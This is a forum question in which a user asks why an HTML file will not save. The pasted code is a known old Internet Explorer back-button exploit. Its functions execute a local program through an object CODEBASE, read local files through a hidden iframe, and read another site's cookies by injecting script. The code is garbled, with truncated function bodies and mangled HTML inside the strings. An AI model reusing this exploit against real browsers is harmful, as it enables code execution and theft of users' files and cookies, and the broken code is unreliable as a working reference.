
The following file cannot be saved as.txt. Later it has to be saved as .html and run in browser. I dont know while the

The following file cannot be saved as.txt.
 Finally iwant to save the file as .html and run in browser. I dont know why the file is not saving. If we remove the script portion from the file it is saving properly as txt and html formats. Can anyone tell me whats wrong . Is this a bug in windows or what makes the code behave so abruptly.

The  Code:

<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///d:/winnt/system32/winmine.exe')">
Run Minesweeper (d:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')">
Read c:test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('<A&NBSP;HREF="HTTP:  class="user_url" ? target="_blank" www.google.com>http://www.google.com/')">
Read Google cookie</a>

// badUrl = "<A&NBSP;HREF="HTTP:  class="user_url" www.nonexistingdomain.se? target="_blank">http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
  s+= 'CODEBASE='+file+'></OBJECT>';
function readFile(file){
  s = '<iframe name=i src='+file+' style=display:none onload=';
  s+= 'alert(i.document.body.innerText)></iframe>';
function readCookie(url){
  s = '<script>alert(document.cookie);close();<"+"/script>';
function backBug(url,payload){
  len = history.length;
  page = document.location;
  s = "javascript:if (history.length!="+len+") {";
  s+= "open('javascript:document.write(""+payload+"")')";
  s+= ";history.back();} else '<script>location=""+url
  s+= "";document.title=""+page+"";<"+"/script>';";
  location = s;

Answers (1)